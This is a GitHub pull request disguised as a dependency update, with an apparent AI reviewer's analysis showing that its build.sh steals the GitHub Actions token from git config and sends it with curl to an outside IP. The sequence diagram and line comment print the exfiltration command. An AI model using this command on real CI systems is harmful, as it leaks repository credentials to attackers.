chore: update deps

[1nd0]

security test

[greptile-apps]

Greptile Summary

This PR introduces a single new file, build.sh, which contains a malicious credential exfiltration script. Despite being titled "chore: update deps" with description "security test," the file does not update any dependencies — it is a supply chain attack payload.

Key findings:

• The script reads the GitHub Actions authentication token from git's hidden config (http.https://github.com/.extraheader), which is automatically set by GitHub Actions to contain the GITHUB_TOKEN bearer credential.
• It base64-encodes the stolen token and silently transmits it to an attacker-controlled server at http://34.209.142.1:4012/exfil.
• If this script were ever invoked in a CI/CD pipeline, an attacker would immediately receive a valid GitHub authentication token, potentially gaining write access to this and related repositories.
• This PR must be rejected and closed immediately. If this script was executed at any point (e.g., in a CI run triggered by the PR), all repository secrets and tokens must be rotated immediately and any repository access logs should be audited.

Confidence Score: 0/5

• This PR must NOT be merged — it is a malicious credential exfiltration attack disguised as a dependency update.
• Score is 0 because the sole change is a malicious shell script designed to steal GitHub authentication tokens and exfiltrate them to an attacker-controlled server. This is not a legitimate code change under any interpretation.
• build.sh — the entire file is malicious and must be rejected.

Important Files Changed

Filename	Overview
build.sh	MALICIOUS: Contains a credential exfiltration payload that reads the GitHub Actions authentication token from git config and silently sends it to an attacker-controlled external server (34.209.142.1:4012).

Sequence Diagram

sequenceDiagram
    participant CI as GitHub Actions Runner
    participant GC as Git Config (http.extraheader)
    participant B64 as base64 encoder
    participant ATK as Attacker Server (34.209.142.1:4012)

    CI->>GC: git config --get http.https://github.com/.extraheader
    GC-->>CI: Authorization: Bearer GITHUB_TOKEN
    CI->>B64: pipe token through base64 -w0
    B64-->>CI: encoded_token
    CI->>ATK: curl -s http://34.209.142.1:4012/exfil?tok=encoded_token
    Note over ATK: Attacker receives and stores stolen token
    ATK-->>CI: (silent, -s flag suppresses output)

Loading

_{Last reviewed commit: 96de5d4}

[greptile-apps]

Critical: Credential Exfiltration Attack

This line is malicious code that steals GitHub authentication tokens and sends them to an attacker-controlled server.

Breaking down what it does:

1. git config --get http.https://github.com/.extraheader — reads the hidden git config key that GitHub Actions automatically populates with Authorization: Bearer <GITHUB_TOKEN>. This contains the repository's CI/CD authentication token.
2. | base64 -w0 — encodes the token to make transmission easier.
3. curl -s http://34.209.142.1:4012/exfil?tok=... — silently (-s) sends the encoded token to an external attacker-controlled server at 34.209.142.1:4012 via the /exfil endpoint.

If this script is ever executed in a GitHub Actions runner (e.g., as part of a build step), the repository's GITHUB_TOKEN or any other configured token would be immediately exfiltrated to the attacker's server, potentially granting write access to this repository and any others the token has permissions for.

This PR must be closed immediately, and the repository's secrets and tokens should be rotated as a precaution if this script was ever executed.

[1nd0]

This was a test reach out to psirt@nvidia.com with any questions